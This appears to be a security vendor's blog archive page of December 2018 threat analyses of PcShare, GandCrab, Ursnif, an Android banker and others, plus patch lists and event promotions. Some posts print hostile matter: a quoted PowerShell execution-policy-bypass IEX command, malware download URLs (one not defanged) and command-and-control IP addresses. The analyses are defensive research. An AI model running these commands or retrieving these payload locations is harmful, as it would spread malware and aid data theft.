New Variant: PcShare Trojan, With [ups2 version 1.0.2] Server, Dec. 2018

/in /by

Overview:

SonicWall Capture Labs, (Threat Research Team): is announcing the:

  • “Trojan variant called PcShare, with the Server “ups2 V1.0.2”.

The older Forshare Trojan was announced around the time WannaCry and the EternalBlue Exploit were being covered by everyone in 2017. No-one seemed to notice the Forshare Trojan. However, after reading the information below. This may change your mind about this new variant. This Trojan has been rebuilt, modified and upgraded. The Trojan capabilities are as follows:

  • Audio & Video Capturing
  • Downloading & Uploading of Files
  • Token Grabbing
  • Checking Process State
  • CPU Frequency Analysis
  • Disk Operations
  • Get Directory List
  • Get File Information
  • Get Directory Information
  • Get Disk Information
  • Renaming Files
  • Executing Files
  • Searching For Files
  • Copying Files
  • Saving Files
  • Searching Directories
  • Get Process List
  • Kill Process
  • Enumerate Processes
  • Enumerate Windows
  • Control Services
  • Reconfigure Services
  • Delete Services
  • Get Service Configs
  • Delete Registry Keys
  • Enumerate Registry Keys
  • Fill Disk Capacity
  • Memory Copying and Comparing
  • Mouse & Keyboard Logging
  • Proxy Support
  • Shell Redirection
  • The bottom of this article will have pictures of the capabilities within the code base

Our network sensor displayed the following IP address information. So, let’s take a deeper look into the sample:

Sample Static Information:

The sample is packed with UPX 2.90 [LZMA] (Delphi Stub) as seen by the following picture:

Unpacking The Sample:

Using CFF Explorer, you can use the “UPX unpack feature” on this sample. The new static information is as follows:

Main Server Information:

Once the sample is unpacked, we can see various information inside the (Main Function) such as:

  • The version number of the server (ups2 V1.0.2).
  • The parameters of the server: (Control Mode, Debug Log, Create Action, Version and Help).
  • The log file name is also given below.

Multiple server instances are allowed:

Windows Audio Control Service:

Scanning through the main function we can find where the (Windows Audio Control) service gets created:

Searching MSDN for CreateServiceA().
We can see that the service is 0x10, meaning a “Service that runs in its own process”.
The service also sets SERVICE_AUTO_START 0x2, A service started automatically by the SCM during startup.

Next, the service will setup its control handler procedure:

The service callback handler can accept (Five) controls.

The controls are all defaulted to the error handling and debugging of the server. It only has one default routine.

This information about the service tells us the (Windows Audio Control) is just a front for debugging and error handling.

The Server Updating and Downloading Multiple Files:

The server will check for and execute every line of the following files listed in “HTTP Network Objects” every two hours:

  • xpdown.dat
  • down.html
  • 64.html
  • vers.html
  • kill.txt
  • downs.txt
  • downs.exe
  • b.exe aka msief.exe
  • item.dll aka item.dat

HTTP Network Objects

Wireshark Http Objects:

[Network Object 1]: xpdown.dat:

When we exported the xpdown.dat object from Wireshark. The object was (RSA Encrypted) with one of the keys below:

This is the object pulled from Wireshark.

This file was also created by the CreateFile API, xpdown.dat code

After the file was created we were able to look at the contents of the file xpdown:

[Network Object 2]: down.html:

[Network Object 3] 64.html:

[Network Object 4]: vers.html:

[Network Object 5]: kill.txt:

[Network Object 6]: downs.txt:

[Network Object 7]: downs.exe:

downs.exe file static information.

downs.exe file information for CACL, legit clean software:

[Network Object 8]: b.exe aka msief.exe:

b.exe static information.

The “b.exe” binary is a self extracting archive file or install file. We can see one of the resources below:

We can use 7zip to unzip the self extracting installer and you will see the following directory structure:

c3.bat

cacls changes permissions on files and folders.
(/e is equal to edit ACL instead of replacing it.)
(/d is deny specified user access.)


n.vbs

The n.vbs script will call c3.bat above.

Special Find, (Item.dll aka Item.dat)

Inside (downs.txt, Network Object 6) we’ve found something pretty special.
When we visited the “/item.dll” location to see if we could download “item.dat” it was active.
We were able to pull down the file. Here is what the static information looks like:

Next, we found out what it the entropy was to see if it was encrypted or packed.

Being that it had a high entropy, we scanned it for packers and protects and found:

Knowing the file was packed and protected we decided to throw the file into Ida Pro anyway.
Mostly, to find out if there were any artifacts we could find and sure enough we found the following:

Finding, “zsdfvvgt.dll” was amazing because it led us straight to github:

(Item.dll aka Item.dat) is a part of this project: https://github.com/sinmx/pcshare/

We located the artifact here: https://github.com/sinmx/pcshare/blob/master/%E4%BC%81%E4%B8%9A%E5%AE%9A%E5%81%9A/PcMain/PcMain.def

This gives us access to the entire code base without unpacking the sample.
Sometimes, you get lucky and find what you need in the dark corners of a binary.

Supported Systems:

Capability Overview:

Audio

Delete Service

CPU Frequency

Disk Operations

Memory Operations

Mouse and Keyboard Operations

Proxy Support

CMyClientMain Class Code Base

Summary:

This Trojan is disguised as legitimate software (Windows Audio Control Service).
This Trojan displayed the following actions:

  • A backdoor which gives malicious users remote control over the machine.
  • An up-loader, down-loader and updater to install malware components and scripts over time.
  • Sample is statically linked with OpenSSL 0.9.8x (10 May 2012). Making the code base larger than it should be. This will generate false positives for Ransomware and Miner Malware.
  • Modifies, deletes, and copies data disrupting the natural performance of your computer and network.
  • Sample uses RSA (Public and Private) Asymmetric Encryption.

SonicWall Gateway AntiVirus, provides protection against this threat:

  • GAV: Barys.A_733

GandCrab Ransomware has started hiding under Javascript and Powershell

/in /by

SonicWall Capture Labs Research team recently observed a malware campaign delivering a GandCrab ransomware hiding under JavaScript and PowerShell. The ransomware is capable of encrypting the files when installed on the victims computer and ask for ransom to decrypt the files. This variant of GandCrab uses powershell.exe to load the payload dll in the memory to perform encryption instead of dropping any PE file and execute it.

Infection Cycle:

The infection begins with a JavaScript file shown in image below.

Fig-1. Initial JavaScript containing encrypted scripts

The above JavaScript contains an encrypted PowerShell script and an encrypted JavaScript. After 10 seconds of delay, it decrypts the encrypted JavaScript and executes it.

Fig-2. Decrypted JAVA Script

This JavaScript creates a log file in %appdata% folder. This log file contains an encoded PowerShell script that is decrypted from the data shown in Fig-1. The encoded PowerShell script shown in Fig below.

Fig-3. Encoded PowerShell Script
 

The PowerShell script is decoded by removing ‘?’ and executed.

To execute the PowerShell Script is uses the following command:

jklqtyurkut.ShellExecute(wcnquc, ‘-ExecutionPolicy Bypass -Command “IEX (([System.IO.File]::ReadAllText(\”+bygeyemm+”bwcuoqir.log”+’\’)).Replace(\’?\’,\’\’));”‘, “”, “open”, 0);

 

where “wcnquc” has the path for PowerShell.exe.

Fig- 4. Decoded powershell script

 

This decoded PowerShell script decodes another PowerShell script using base64 algorithm and executes new PowerShell script. The new decoded PowerShell script is below:

Fig-5. 2nd PowerShell Script

This second PowerShell script contains a compressed PE file encoded with base64. It decompresses the PE file and loads this file in the memory of powershell.exe. This loaded PE file is a dotnet dll, which contains a base64 encoded another PE file. The dotnet dll the decodes the new PE file and loads in the memory as shown in fig below:

Fig-6. Dotnet Dll containing Base64 encoded PE file

This decoded PE file is a Borland Delphi dll, which contains an encrypted GandCrab payload file. It decrypt the main payload in memory and executes it. Now payload is executing in the memory of powershell.exe and it starts the encryption. There is no PE file dropped on disk and malicious GandCrab payload is loaded and executed inside the memory of powershell.exe.

After encryption, it shows the following message by changing desktop’s wallpaper.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: GandCrab.RSM_10 (Trojan)

Microsoft Security Bulletin Coverage for December 2018

/in /by

SonicWall Capture Labs Threat Research Team has analyzed and addressed Microsoft’s security advisories for the month of December 2018. A list of issues reported, along with SonicWall coverage information are as follows:

CVE-2018-8477 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8514 Remote Procedure Call runtime Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8517 .NET Framework Denial Of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8540 .NET Framework Remote Code Injection Vulnerability
There are no known exploits in the wild.
CVE-2018-8580 Microsoft SharePoint Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8583 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13943 Chakra Scripting Engine Memory Corruption Vulnerability (DEC 18) 3
CVE-2018-8587 Microsoft Outlook Remote Code Execution Vulnerability
ASPY 5339 Malformed-File rwz.MP.2
CVE-2018-8595 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8596 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8597 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8598 Microsoft Excel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8599 Diagnostics Hub Standard Collector Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8604 Microsoft Exchange Server Tampering Vulnerability
There are no known exploits in the wild.
CVE-2018-8611 Windows Kernel Elevation of Privilege Vulnerability
ASPY 5341 Malformed-File exe.MP.46
CVE-2018-8612 Connected User Experiences and Telemetry Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8617 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 3756 EXPLOIT HTTP Client Shellcode 19
CVE-2018-8618 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13944 Chakra Scripting Engine Memory Corruption Vulnerability (DEC 18) 4
CVE-2018-8619 Internet Explorer Remote Code Execution Vulnerability
IPS 13939 Internet Explorer Remote Code Execution Vulnerability (DEC 18)
CVE-2018-8621 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8622 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8624 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13936 Chakra Scripting Engine Memory Corruption Vulnerability (DEC 18) 1
CVE-2018-8625 Windows VBScript Engine Remote Code Execution Vulnerability
IPS 13945 VBScript Engine Remote Code Execution Vulnerability (DEC 18) 1
CVE-2018-8626 Windows DNS Server Heap Overflow Vulnerability
There are no known exploits in the wild.
CVE-2018-8627 Microsoft Excel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8628 Microsoft PowerPoint Remote Code Execution Vulnerability
ASPY 5340 Malformed-File ppt.MP.8
CVE-2018-8629 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13937 Chakra Scripting Engine Memory Corruption Vulnerability (DEC 18) 2
CVE-2018-8631 Internet Explorer Memory Corruption Vulnerability
IPS 13935 Internet Explorer Memory Corruption Vulnerability (DEC 18) 2
CVE-2018-8634 Microsoft Text-To-Speech Remote Code Execution Vulnerability
IPS 13934 Internet Explorer Memory Corruption Vulnerability (DEC 18) 1
CVE-2018-8635 Microsoft SharePoint Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8636 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8637 Win32k Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8638 DirectX Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8639 Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8641 Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8643 Scripting Engine Memory Corruption Vulnerability
IPS 13946 Windows Scripting Engine Memory Corruption Vulnerability (DEC 18) 1
CVE-2018-8649 Windows Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8651 Microsoft Dynamics NAV Cross Site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2018-8652 Windows Azure Pack Cross Site Scripting Vulnerability
There are no known exploits in the wild.

PDF campaign distributing Ursnif through malicious VBS

/in /by

SonicWall RTDMI engine detected a number of PDF files containing link to malicious archive file. The non-existence of this malicious file at the time of detection in popular malware search portals like the VirusTotal and the Reversing Labs indicates the effectiveness of the RTDMI engine.

Fig-1 VirusTotal results for the PDF file

 

Analysis

PDF file are being distributed to victims, disguised as a document from Australian Organizations like Indigenous Business Australia etc. To deceive victims, PDF file is made to look as realistic as possible by having misleading text and icons related to the organization whose users would be targeted. The document file displays an icon showing the victim that a document file would be downloaded on clicking the icon, as shown in the images below. Rather an archive containing malicious VBScript is downloaded from “hxxp://kruanchan.com/00198728883.zip”.

Fig-2 Snapshots of PDF files.

At the time of analysis, both the archive and the malicious VBScript have detection from a handful of AV Vendors as could be seen below:

Fig-3 VirusTotal results for the downloaded archive file

Fig-4 VirusTotal results for the VBS script file

To hinder analysis, the VBScript is highly obfuscated as shown below:

Fig-5: Obfuscated VBScript code

Fig-6 Code of VBScript after deobfuscation

It could be seen above, the script first creates an Internet shortcut file named “Google.url” in the %TEMP% directory, having ‘www.google.com’ as the target link. Then it tries to download malicious content from “hxxp://news.pompeox.org/”, save it in the %TEMP% folder as “ie.exe”, finally executes the downloaded file. The downloaded file belongs to Ursnif malware family.

Indicators of Compromise:

 PDF:

0a2f235f05f376fcf150fda15229b070dec2018cb944b1bd0d9a4e25b5bdcf93

27ea0ef04a082aa7a48f48d4197b9039eeadd4b01eb6c285581acdcc436d5d9c

3a22b101a3af813080be8aaeb73583eef5f4683363330cd6a0342efee1282b7b

3e96c3c6829cd3fc3b79c9407321f832ff30d372a350e5eead67a907c188f814

97992932e1651273168da68bfbbe7ed50a02e5829ccdfde9543faeb83020835d

b3da4bbdc7e6da8111eff84051f0c91da2424905e7ea81facd8f3ceba01e1222

e9fc167781608914489c500ed5445c27db0b3e216a7917c2c9b88269ba864b6c

Archive: ab74a5181b552055621e1abbd0336a1d7f110360db20ab8e51f97a332d4024e3

VBS: 554da6d32b3226bfe058fa545be80dc06895cca33843bf618c7c65a5e14d47b4

Fig-7 Snapshot of SMASH detection Report

Video: Why Layered Security Matters

/0 Comments/in , /by

Understanding the benefits of certain security technology is always important. But hearing innovation explained by two cybersecurity industry icons provides the context to appreciate how it works and the importance of implementing sound defenses to survive in an ever-changing cyber war.

In this exclusive video, SonicWall President and CEO Bill Conner and CTO John Gmuender walk you through the current cyber threat landscape, explore the importance of automated real-time breach detection and prevention, and address how to mitigate today’s most modern cyberattacks. The video provides:

  • Exclusive cyberattack data for ransomware, malware, encrypted threats, web app attacks, malware attacks on non-standard ports and more
  • In-depth view into the key security layers that power automated real-time detection and prevention
  • Real-world use cases, including remote and mobile security, web application protection, traditional network security, cloud sandboxing and more
  • Detailed breakdown of the SonicWall Capture Cloud Platform

NRF 2019: Join SonicWall at the ‘Big Show’

/0 Comments/in , /by
SonicWall at NRF 2019
Booth 1045
Javits Center
655 W 34th Street
New York, NY 10001
REGISTER NOW

Register now to get a free lunch voucher and learn how SonicWall can help protect your retail organization.

The end of the year may be approaching, but SonicWall is already gearing up for 2019 by attending one of the retail industry’s biggest events.

Join SonicWall at NRF 2019, the National Retail Federation’s ‘Big Show,’ Jan.13-15 at the Jacob K. Javits Convention Center in New York. The NRF 2019 agenda features a lineup of industry expert speakers, networking events and lounges, workshops, podcast studio and expo hall.

SonicWall is partnering with Cerdant at Booth 1045 on the expo floor, where more than 37,000 attendees are expected to explore innovative technologies, learn about groundbreaking solutions and connect with more than 700 exhibitors impacting retail today.

Who Attends NRF 2019?

NRF 2019 attendees include retailers, industry professionals and members of the press. Attendees seek to absorb rich and robust content from the leaders of retail, technology, finance and business, as well as to learn about and source new products and services to transform their business. To get a sense of the scope and scale of the event, watch the NRF 2018 recap:

SonicWall is a leader in cybersecurity and PCI compliance for retail networks and offers attendees a unique booth experience with access to learn how retailers can:

  • Comply with PCI and other security and privacy regulations
  • Block increasing ransomware, email threats, memory exploits and encrypted malware
  • Secure new tablet-based POS endpoints
  • Protect both wired and wireless networks
  • Easily deploy and manage security across multiple distributed branches or locations
  • Ensure maximum security within limited budget constraints
  • Protect business with secure email communication

More than 15,000 retail and hospitality organizations worldwide already rely on SonicWall for fast, secure and easy-to-manage wireless access for customers and employees, scalable email security that protects both the organization’s and customers’ data, and centralized security management that increases effectiveness while decreasing admin costs.

Register for NRF 2019 now and receive a lunch voucher, compliments of SonicWall.

About NRF

The National Retail Federation (NRF) is the world’s largest retail trade association, representing discount and department stores, home goods and specialty stores, Main Street merchants, grocers, wholesalers, chain restaurants and internet retailers from the United States and more than 45 countries.

Membership with NRF provides retailers with the opportunity to advocate on important policy issues, gain insights from industry leaders and visionaries and network with retail’s best and brightest.

Cyber Security News & Trends – 12-07-18

/0 Comments/in /by

This week SonicWall has taken to the airwaves as CEO Bill Conner is profiled by KRLD Radio, and in industry news, more new breaches revealed but impacted companies like Quora are saying that Marriott International has it far worse.

SonicWall Spotlight

New Law Aids SMBs in Combating Cybersecurity Risks – The Channel Pro Network

CRN’s 2018 Products of the YearCRN

  • The SonicWall Capture Cloud Platform was announced as a finalist in CRN’s 2018 Products of the Year in the security-cloud category.

CEO Spotlight: Bill Conner, CEO, SonicWall – KRLD Radio (US)

  • SonicWall CEO Bill Conner is featured on KRLD’s CEO Spotlight radio segment discussing SonicWall’s holiday cyber threat data.

Cyber Security News

Cyber-espionage group uses Chrome extension to infect victims – ZD Net

  • Netscout researchers have released a report revealing details of a nation-state-backed hacking group’s efforts to target the academic sector by pushing a malicious Google Chrome extension through a spear-phishing email campaign.

DHS Says SamSam Ransomware is Targeting Critical Infrastructure Entities – Security Week

  • The Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) issue an alert on activity related to SamSam, the malware which has supposedly cost private enterprises and organizations over $5.9 million in the last two years.

U.S. Financial Firms to Further Increase Cybersecurity Spending – Bloomberg

  • U.S. banks and other financial firms are projecting higher spending on cybersecurity as they face bigger threats and more attacks.

Marriott looking at China in data breach: report – The Hill

  • Investigators looking into the recent Marriott breach, which saw personal data belonging to over 500 million hotel guests exposed, are looking to China as the most likely source of the attack.

Quora reports data breach affecting 100 million users – Phys Org

  • Quora has notified users of a data breach involving the email addresses and encrypted passwords of about 100 million users. The question-and-answer website is downplaying the incident, claiming that it “is nothing like” the sustained breach suffered by Marriott International over the last four years.

Why Cyber Monday Is Just the Beginning of the Festive Hacking Season – ZDNet

  • Cyberattacks reach a peak around the holiday season but ZDNet argue that understaffing over Christmas leaves many companies open to further attacks.

Huawei Said to Plan $2 Billion Cybersecurity Reboot – Industry Week

  • Small companies often do not have the resources to be able to meet the strictest cybersecurity standards. Two academics argue that they should not be financially penalized in the same way as larger corporations can be.

In Case You Missed It

Archive file carrying an obfuscated and multi-staged downloader first spotted by SonicWall RTDMI

/in /by

SonicWall RTDMI engine has recently seen a surge in archive files (~600-700 Bytes in size) floating in the network.

 

Unavailability of the archive file in any of the popular threat intelligence sharing  portals like the VirusTotal and the ReversingLabs indicates its uniqueness and limited distribution.

The archive files seem to carry a batch script in the name *.jpg.cmd or *.pdf.cmd

Batch script is highly obfuscated as shown below, which downloads and executes a PowerShell script.

Deobfuscated batch script as shown below, downloads initial payload from ‘http://fortalecergroup.com.br/bals/index.php?o=YmFsczM=’

The code snippet of the downloaded PowerShell script is shown below:

The PowerShell further downloads a second stage payload, which is an encrypted archive file.  Archive file is encrypted using simple XOR algorithm to evade from detection. The downloaded content is first decrypted, extracted, the component files as listed below are then renamed with random names and appropriate file extensions and then executed by the PowerShell script.

For persistence, a run entry is added in the registry and a shortcut file is created in the startup folder as shown below:

The only purpose of the AutoIt script is to load and execute the malicious DLL file as shown below:

Upon analysis, the malicious DLL file is found to be a spyware which uses anti-reversing and anti-VM techniques to hinder analysis. The spyware is capable of:

  1. Logging keystrokes

2. Capturing screenshots

3. Stealing system information

4. Sending the stolen data to remote server

Capture ATP report for this file:

 

Updated on 12/12/2018

We have noticed a change in the file name pattern as well as the number of files being carried by the archive as shown below:

Recently received archive contains a clean Microsoft Installer in addition to a malicious batch file as shown below:

 

At the time of analysis, the malicious batch file was not available in any of the popular threat intelligence sharing portals like the VirusTotal and the ReversingLabs:

The batch file is highly obfuscated as shown below:

The purpose of the batch is to download and execute a malicious PowerShell script.

Flash Zero day CVE-2018-15982

/in /by

Adobe Flash Player has  a use after free vulnerability, which allows arbitrary code execution. The malicious swf file exploits this vulnerability to gain access and execute code on the victim’s computer. Adobe has patched this vulnerability.

Adobe flash player plugin crashes when malformed flash file is run in a browser .

SonicWALL Capture Labs provides protection against this threat via following signatures:

IPS 5336 : Malformed-File swf.MP.598

GAV 9914 : CVE-2018-15982

Dew18 banker for Android targets Korean financial institutions

/in /by

Bankers are one of the most widespread threats seen in the Android malware landscape. Most of these threats target specific banks and steal login credentials, credit card numbers and other sensitive data from the infected device.

SonicWall Threats Research Team observed a campaign that has been spreading since the last few months and targeting Korean banks, we have named this campaign as the Dew18 campaign since samples belonging to this campaign have Dew18 in their package name.

Few functionalities of the malware present in this campaign include stealing sensitive data like call logs and SMS messages from the device, blocking the user from contacting customer care of certain banks and killing a particular spam detector app thereby preventing the user from spam detection when receiving a potential spam call.

Infection Cycle: Application Installation & Execution

The malware requests for the following permissions during installation:

  • android.permission.WRITE_EXTERNAL_STORAGE
  • android.permission.INTERNET
  • android.permission.READ_SMS
  • android.permission.READ_CONTACTS
  • android.permission.READ_CALL_LOG
  • android.permission.RECEIVE_BOOT_COMPLETED
  • android.permission.WAKE_LOCK
  • android.permission.READ_PHONE_STATE
  • android.permission.CALL_PHONE
  • android.permission.PROCESS_OUTGOING_CALLS
  • android.permission.WRITE_CALL_LOG
  • android.permission.READ_CONTACTS
  • android.permission.MODIFY_PHONE_STATE
  • android.permission.SYSTEM_ALERT_WINDOW
  • android.permission.READ_EXTERNAL_STORAGE
  • android.permission.WRITE_EXTERNAL_STORAGE
  • android.permission.ACCESS_NETWORK_STATE
  • android.permission.KILL_BACKGROUND_PROCESSES
  • android.permission.BOOT_COMPLETED
  • android.permission.ACCESS_BACKGROUND_SERVICE
  • android.hardware.telephony

Majority of the malware belonging to from this campaign use an icon closely resembling other banking apps. One of the sample we analyzed uses the icon of the official Citibank finance app as visible once it gets installed:

 

Once installed and executed we are shown the main screen in the app which accepts user inputs to apply for a loan and few other screens to choose from the options in the top menu. None of the links or buttons in any page except the loan application page work, they are just static pages displayed in the app:

The loan application page accepts details from the user and once the Apply button is clicked the user is informed that his application has been submitted. There is no activity from the app that would indicate that any loan related data is sent, this is just shown to the user to make him feel that the app is actually doing something:

 

Infection Cycle: Device related data

Once the execution begins, the malware starts sending personal information from the infected device:

As visible above, the malware is more interested in the calls made and received from the device. Below images show different areas in the code where sensitive data from the device is accessed:

 

Infection Cycle: Outgoing calls and Phone numbers

The malware contains interesting code related to outgoing calls. It contains a list of numbers belonging to customer care of certain Korean banks, if a number from this list is called it loads a specific audio file from its assets folder and plays it effectively blocking the user from contacting the bank. For the user, it would feel as if this voice came from the banking representative he made  the call to but in reality the call never went through.

Figure below shows a snippet of phone numbers that the malware monitors when an outgoing call is made and few audio files from the assets folder:

Based on the phone number dialed an appropriate audio file is played to mimic a person answering the phone. The malware also displays a stock background image for incoming/outgoing calls to make things look authentic and believable (more on this later in the blog):

 

A quick search based on the hard-coded phone numbers and file name of the audio files confirmed that they belong to the customer service of certain banks:

 

A rough translation of the audio from one of the audio files is as follows:

  • “Welcome to (name) corporation. Through our safe and convenient loan service we will take care of you.”

We observed code that mentions replacing the outgoing phone number, during our analysis we did see console logs indicating this but it did not reflect on the device being used for the call. Considering how this malware plays a default audio recording if a number belonging to a bank/financial institution is dialed, it is possible that the malware replaces the number and makes a call to one of the attackers. The attackers can then pose as a real banker and request for sensitive user information like bank account numbers, credit card numbers and other details making this a clever scam.

Infection Cycle: Kill the spam detector

These days there are a number of useful apps that check the incoming number and notify the user if it is a potential spam call before the user receives the call. Such apps are extremely useful, so much so that Google took notice of this feature and incorporated it into their OS.

One such spam detecting Korean app is WhoWho, this app enjoys a good user base as visible from its high ratings:

 

When a call is received on the infected device this malware quietly kills the spam detector app WhoWho if it is installed on the device thereby helping the spammers:

Floating call windows

As mentioned earlier, when a call to a particular number is made from the infected device this malware simulates a call by playing an audio file. To make things more convincing based on the make of the phone the malware displays an appropriate stock background for outgoing calls used for certain popular phones, we observed code for the following phone manufacturers in the samples:

  • Samsung
  • LG
  • Pantech

All the above manufactures are based out of South Korea and phones from these manufacturers are a popular choice among Korean users.

Below is a comparison of a the real-world outgoing call background from a Samsung device, what happened when we made an outgoing call from an infected device and stock images saved by the malware in the resources folder:

The outgoing call background effect is achieved in Android using Floating Windows which is essentially a small overlay on top of the current view/activity.

The Dew18 campaign

The earliest sample belonging to this campaign can be traced back to October 22, 2018 whereas the latest one dates to today – December 5, 2018. This indicates that this is a fairly new campaign.

Based on our observations, samples belonging to this campaign have one of the following package names:

  • com.example.dew18.myapplication
  • com.example.dew18.a

Most of the application names and icons are that belonging to Korean financial institutions, few are mentioned below:

  • KB Kookmin Bank
  • NH Capital
  • Hana financial group

Following are few domains that were contacted  by different samples from this campaign during our analysis:

  • 45.120.69.4
  • 45.120.69.57
  • 112.219.131.74
  • 182.162.104.210
  • 182.162.104.245
  • 211.169.248.219
  • 211.169.248.246

We observed links for the following hardcoded php pages in every sample belonging to this campaign:

  • [server_ip]/InfoFromAPP.php – Information from the infected device is sent to this page
  • [server_ip]/upload_ok.php – We did not see network activity for this page during our analysis

Investigation using VirusTotal for this campaign and IP addresses revealed an interesting page:

  • [server_ip]/login.php

This page contains additional redirects:

  • If an ‘admin’ logs in – /adminpage.php
  • If a ‘user’ logs in – /sample1.php

At the time of writing this blog, one of the pages is still serving a malicious apk belonging to this campaign at the link:

  • [server ip]/aaa.apk

There is a possibility that this campaign operates using a Malware-as-a-Service (MaaS) model as this campaign has a fairly good implementation to carry out financial frauds, this makes it extremely attractive to scammers.

 

SonicWall Capture Labs provides protection against this threat with the following signatures:

  • AndroidOS.Dew.BNK
  • AndroidOS.Dew.BNK_2